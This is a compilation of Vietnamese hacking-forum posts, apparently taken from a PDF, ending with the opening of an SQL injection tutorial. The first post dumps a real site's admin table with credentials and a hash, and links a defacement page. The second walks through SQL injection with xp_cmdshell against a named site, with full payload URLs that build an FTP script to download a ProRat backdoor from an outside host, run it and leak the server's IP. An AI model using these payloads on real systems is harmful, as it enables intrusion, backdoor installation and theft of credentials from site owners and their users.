Phần này có chức năng show ra table và column nếu như bạn biết login và password của CSDL cái ở trong file dbconfig.php đó Giờ chỉ việc thay user và pass mà ta kiếm được ở trên vào và s
Trang 1Phần này có chức năng show ra table và column nếu như bạn biết login và password của CSDL
(cái ở trong file dbconfig.php đó)
Giờ chỉ việc thay user và pass mà ta kiếm được ở trên vào và show :
Có gì nào , tables và column của database show ra hết hehe
Kéo lui xuống dưới tìm table của admin :
Trích:
| - xhp_users
| - id
| - username
| - password
| - session_id
| - first_name
| - last_name
Có trong tay tên các table và thông tin về CSDL rồi ta query table admin để tìm user và pass :
Có gì nào : id ; username ; password ; session_id
Trích:
admin
1004munkmunk1968
5ba8d1b662edeed1cd304ac98b62fde3
Trang 2Rồi vô trang chủ vào phần admin để login vào
Còn đây là cái Cpanel
hehe :
Trích:
http://www.leonida.ro/hacked.htm
Dondoc(vniss)
Up back door khi co' DBO, lay tu Nha truyen thong :D
Tác giả: famydmx, post trong Vniss cũ, bài viết khá rõ ràng và dễ hiểu
Chào các bạn, tui chỉ là 1 newbie ở đây thui Trước đây tui cũng thắc mắc về cách upload backdoor lên server dữ lắm Sau khi vào Matrix để học hỏi thì vừa rùi tui đã
up được 1 con lên server, hehe Tui sẽ post quá trình upload mà tui đã làm để mọi người tham khảo (site là www.naame.com và backdoor tui đã up là ProRat 1.8)
Bạn phải chuẩn bị sẵn 1 account FTP chứa backdoor mà mình muốn up lên (như netcat hay con ProRat mà tui đang dùng chẳng hạn)
Bạn có thể tạo tại site www.esmartweb.com Log in vào account đó sau đó click vào link Enable FTP access rồi dùng ftp để up backdoor lên (username và
password mà bạn đã đăng ký, địa chỉ ftpserver lấy từ mail nó gởi cho bạn) Tui đã tạo sẵn 1 account như vậy :
username : hyunjlove
password : password
ftpserver : ftpserver.esmartdesign.com
Đầu tiên xác định user hiện tại có phải là dbo (chủ của database) không ? Hình như là chỉ có dbo mới được dùng master xp_cmdshell để up backdoor lên, tui
Trang 3không biết các user khác dbo có dùng được không nữa, hihi
Các đoạn code thêm vào đều nằm sau :
http://www.naame.com/whois1.asp?from rstpage&dname=
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname='%20o r%201=convert(int,user_name()) sp_password
Nó sẽ báo lỗi như vầy :
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'dbo' to a column of data type int /includeFiles/whois1.asp, line 27
user hiện tại đúng là dbo!
Tiếp theo sẽ tạo 1 kịch bản trên server để up, file script tui sẽ tạo tên là s có nội dung như sau :
open ftpserver.esmartdesign.com
user hyunjlove password
bin
get accsvr.exe
quit
hyunjlove và password chính là username và password của tui, accsvr.exe là con backdoor của tui
Để tạo script trên bạn lần lượt đánh vào các URL sau :
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20open%20ftpserver
.esmartdesign.com%20>>s' sp_password
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20user%20hyunjlove
%20password%20>>s' sp_password
Trang 4http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20bin%20>>s' sp_password
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20get%20accsvr.exe %20>>s' sp_password
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20quit%20>>s' sp_password
Chạy ftp trên server để lấy backdoor về :
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'ftp%20-v%20-i%20-n%20-s:s' sp_password
Chờ 5 phút! hehe
- Chạy con backdoor trên server như sau :
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'accsvr.exe' sp_password
- Hehe, việc còn lại là cần tìm là tìm địa chỉ IP của cái server mình vừa upload lên (thường thì server chạy SQL Server nằm cùng với host của site đó nhưng mà trường hợp này thì hic hic, nó nằm ở chỗ khác!)
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';cre ate%20table%20systablesz(a%20int%20identity,b%20va
rchar(1000))%20insert%20into%20systablesz%20exec%2
0master xp_cmdshell%20'ipconfig' sp_password
http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname='%20o r%201=convert(int,(select%20top%201%20b%20from%20s
ystablesz%20where%20b%20like%20'%25IP Address%25')) sp_password
Nó sẽ hiện thông báo lỗi như thế này :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address : 65.210.194.10 ' to a column of data type int
Trang 5Vậy là IP của server là 65.210.194.10
- Connect vào server :
Vào google search "ProRat v1.8 download", down con này về Chạy file
prorat.exe, gõ IP vào rùi click nút connect thế là vào được server, tiếc rằng trong này chẳng có gì hay cả
by famydmx
SQL Injection Tutorial
//********************//
//*******INTRO:*******//
//********************//
•
Hầu hết các chương trình ứng dụng web mới đều dựa trên cấu trúc dữ liệu động để
để đạt được tính hấp dẫn của các chương trình desktop cổ điển Cơ chế động này đạt được bằng cách thu thập dữ liệu từ 1 database Một trong những nền database phổ biến hơn cả trong các ứng dụng e-shop là SQL Rất nhiều các ứng dụng web chỉ dựa hoàn toàn vào những scripts ở đầu vào ( phía người dùng - client ), những đoạn scripts này chỉ đơn giản là truy vấn 1 SQL database nằm ở ngay trên
webserver hay nằm trên 1 hệ thống đầu cuối ( phía server ) riêng biệt Một trong những cách tấn công khó bị nhận thấy và nguy hiểm nhất lên 1 ứng dụng web bao gồm việc chiếm đoạt những chuỗi truy vấn được dùng bởi các scripts, để đoạt quyền điểu khiển ứng dụng đó hoặc các dữ liệu của nó Một trong những cơ chế hiệu quả nhất để đạt được điều đó là một kỹ thuật gọi là SQL injection ( kỹ thuật chèn những câu lệnh SQL )
//********************//
//*****CONTENTS:******//
//********************//
Cơ sở dữ liệu là trái tim của một website thương mại Một cuộc tấn công vào
Trang 6server lưu giữ CSDL có thể gây ra thất thoát lớn về tài chính cho công ty Thông thường CSDL bị hack để lấy các thông tin về thẻ tín dụng Chỉ cần một cuộc tấn công sẽ làm giảm uy tín và lượng khách hàng bởi vì họ muốn thông tin về CC của mình được an toàn Hầu hết các website thương mại dùng Microsoft SQL (MSSql)